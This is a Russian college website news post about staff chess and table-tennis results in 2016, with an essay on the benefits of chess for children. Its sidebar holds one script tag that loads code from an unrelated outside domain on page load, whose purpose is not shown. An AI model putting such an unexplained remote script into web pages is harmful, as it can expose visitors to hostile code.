Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2016 » Март » 14 » Шахматы – это нужная игра
14:42
Шахматы – это нужная игра

12 марта в 2016 года  на базе  ГАПОУ ТО «Тюменский техникум строительной индустрии и городского хозяйства» прошли соревнования по настольному теннису и шахматам в зачёт X Спартакиады руководителей, преподавателей и сотрудников ПОО Тюменской области 2015-2016 учебного года. В данном мероприятии участвовало 12 команд СУЗов области, среди которых была представлена и команда ГАПОУ ТО «Голышмановский агропедколледж».
      По Положению соревнований  в настольном теннисе и шахматам состав команды – три человека: 2 мужчины + 1 женщина. В настольном теннисе  агропедколледжа заняла почётное 7 место, а в шахматах – 11 место. Из-за того,  что команда  агропедколледжа по шахматам была представлена не в полном составе, потому как среди работников трудового коллектива не нашлось ни одной женщины, которая могла бы играть в шахматы и соперники сразу получали фору выигранной партии за счёт отсутствия женщины за третьей доской.
      Ещё раз хочется напомнить, что шахматы во все времена, в далеком прошлом и в настоящее современное время, привлекали и привлекают к себе  внимание и детей  и взрослых. Мудрость, увлекательность и спортивный азарт этой игры никогда не позволят ей стать неинтересным и скучным занятием.  Умственное развитие, развитие мышления является важной стороной в развитии личности дошкольников, и детей младшего школьного возраста, в частности ее познавательной сферы. Современный педагог  уделяет массу времени для претворения и достижения целей и задач  как дошкольного образования так и  школьного в направлении развития личности ребёнка посредством шахмат. Поскольку каждый учитель и воспитатель  находится в постоянном поиске новых путей и подходов для развития детского мышления, то шахматы являются одним из эффективных средств решения поставленной задачи. В этой связи, шахматы - это нужная игра, потому как они представляют собой не только игру, доставляющая детям радость, удовольствие, но и эффективное средство гармонического развития личности.
     Известно, что во многих странах мира в последние годы заметно повысился интерес к  шахматам. И это не случайно. Древняя игра, оказывает огромное влияние на развитие интеллекта и тех личностных качеств человека, которые  необходимы в современном мире. Например, вырабатывает умение в короткий промежуток времени принимать правильное решение. Шахматы также приучают человека к микрострессам, потому что каждая проигранная партия и есть микростресс. Замечено, что шахматисты не теряются в критических ситуациях, не впадают в панику, а думают, ищут выход. Также известно, что шахматы учат логически мыслить, а увлекающиеся этим спортом дети хорошо учатся, без проблем поступают в институты, делают прекрасную карьеру.
     С медицинской точки зрения шахматы очень полезны. Если ребенок непоседлив, не может сосредоточиться, то после занятий шахматами он постепенно избавляется от этих недостатков. Как говорил Александр Алехин: “С помощью шахмат я воспитал свой характер”.
     Словом, польза от шахмат - огромная, а затраты на них - минимальные. На Западе, да и на Востоке, в развитие детского шахматного спорта сегодня вкладываются огромные деньги. Этот интерес лет восемь назад был сильно подогрет опубликованным в прессе докладом ЮНЕСКО о результатах специального исследования о влиянии шахмат на развитие ребенка. В исследовании принимали участие американские научные светила и представители Шведской королевской педагогической академии. Вывод был сделан однозначный - польза от этой игры несомненная. Так что детские шахматы теперь занимают в досуге ребят чуть ли не ведущее место. Вводятся они и как отдельный предмет в школьные программы.


Просмотров: 547 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Март 2016  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
28293031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz